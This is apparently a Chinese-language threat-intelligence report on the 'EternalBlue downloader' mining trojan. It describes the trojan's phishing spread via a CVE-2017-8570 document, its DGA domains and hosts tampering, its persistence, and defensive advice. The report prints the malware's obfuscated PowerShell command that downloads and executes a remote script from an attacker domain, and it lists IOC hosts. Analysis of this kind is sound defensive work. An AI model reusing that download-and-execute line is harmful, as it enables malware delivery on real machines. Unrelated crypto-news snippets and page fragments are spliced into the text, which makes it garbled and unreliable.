來源:騰訊御見威脅情報中心
編者注:原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播,附件含CVE-2017-8570漏洞攻擊代碼》
“永恒之藍”下載器木馬在感染用戶機器上運行后,會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔,該文檔附帶CVE-2017-8570漏洞攻擊代碼。
如果被攻擊用戶收到郵件并不慎打開文檔,就可能觸發漏洞執行Powershell命令下載mail.jsp:
Circle:已將Silvergate持有的一部分USDC儲備轉移到其他銀行合作伙伴:金色財經報道,穩定幣發行商 Circle 官網發文稱,由于Silvergate Bank持續存在不確定性,今天 Circle 已將 Silvergate 持有的一小部分 USDC 儲備存款轉移到我們的其他銀行合作伙伴。所有 USDC 儲備均由幾家資本充足的美國銀行和 Circle Reserve Fund 持有,該基金目前約占 USDC 儲備的 80%。這些儲備金的總和現在由德勤每月審查和證明。
另外,Circle 的客戶服務、運營、風險管理和財務團隊已經將替代方案通知了其余依賴 Silvergate 的客戶。盡管 Silvergate 表示其與存款相關的服務不受影響,但 Circle 正在積極轉移剩余 Silvergate 相關服務。[2023/3/4 12:42:05]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
知情人士:NFT市場Blur將以10億美元估值進行融資:2月14日消息,據推特用戶@tier10k透露,NFT市場Blur將以10億美元估值進行融資。[2023/2/14 12:06:08]
而下載使用的域名ap35nf7.jp實際上并沒有注冊,但是依然能夠解析到地址:t.awcna.com,是因為被感染機器的本地hosts文件被篡改,使得隨機生成的域名映射到木馬使用的惡意地址,細節請參考御見威脅情報中心此前發布的報告:《“永恒之藍下載器”木馬篡改hosts指向隨機域名,再用多個漏洞攻擊內網挖礦》。
6個月或更短時間Holder的比特幣持有量占比跌至15%,創歷史新低:金色財經報道,區塊鏈分析公司 Glassnode 數據分析顯示,持有 6 個月或更短時間的比特幣持有者群體目前擁有約 300 萬枚 BTC,相當于總流通供應量的 15%,創下有史以來的最低百分比。據悉,該指標上一次觸及低點發生在2015年熊市,當時數據約為17%,但從那時起的兩年多的時間里,比特幣價格從 200 美元漲到了 20,000 美元。分析表明,持有 6 個月或更短時間的比特幣持有者群體通常在兩個關鍵事件期間大量涌現,一是長期投資者在市場走強階段進行投資和撤資的牛市期間,二是投降拋售期間,廣泛的市場恐慌會使“持幣時間較短”的用戶重新進入流通。(cryptoslate)[2023/1/3 22:22:42]
本次攻擊過程中,木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp經過高度混淆,多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行,并使用了新的計劃任務名:
“Bluetea“藍茶。
“永恒之藍”下載器木馬自出現之后從未停止更新,從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺,并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上,最初通過供應鏈攻擊積累一批感染機器后,又不斷利用”永恒之藍”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法進行擴散傳播,近期又增加了DGA域名攻擊和釣魚郵件攻擊,其最終目的只為利用用戶機器挖礦門羅幣獲利。
永恒之藍下載器木馬的歷次版本更新參考下表:
安全建議
1.建議用戶不要輕易打開不明來源的郵件附件,對于郵件附件中的文件要格外謹慎運行,如發現有腳本或其他可執行文件可先使用殺軟件進行掃描;
2.服務器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令,避免遭遇弱密碼爆破攻擊;
3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570,需進行漏洞掃描和修復,或采用WindowsUpdate進行。
IOCs
http//t.awcna.com/mail.jsp
譯者:溯元育新劉嘉培 來源:?溯元育新 橋水基金的創始人和首席投資官RayDalio憑借橋水基金的優異業績、浸全球宏觀市場數十年的深刻洞見,以及《原則》和《債務危機》兩本書.
1900/1/1 0:00:00今天是愚人節,CoinMarketCap也娛樂了一把,這家加密貨幣數據網站見證了大量“廁紙代幣”的誕生。CMC在3月31日將廁紙代幣排在了第0位,流通供應量則為缺貨狀態.
1900/1/1 0:00:00來源:Cointelegraph中文,原題《PeterVessenes看好中美市場一體化,兩者的互補是絕佳的組合》3月25日Cointelegraph中文線上脫口秀系列欄目Focus第三期圓滿結.
1900/1/1 0:00:00來源:頭條號 3月27日,著名經濟學家、數字資產研究院學術與技術委員會主任朱嘉明在《數字貨幣對宏觀經濟的影響與展望》線上閉門研討會指出,數字貨幣已經成為理解現代經濟中不可排斥的一個因素.
1900/1/1 0:00:00來源:Cointelegraph中文,原題《歐洲委員會呼吁區塊鏈開發以國防為重點的解決方案》作者:MARIEHUILLET3月24日,歐盟委員會發布了一份歐洲國防工業發展計劃招標書.
1900/1/1 0:00:00“有法律相關崗位么?”,“有招運營么?”,“有招市場么?”,“招客服么?“,“開發招么?”,“成都有哪些崗位啊?”,“求海南海口或者三亞區塊鏈崗位”,“面向2021屆畢業生招聘實習生么?”.
1900/1/1 0:00:00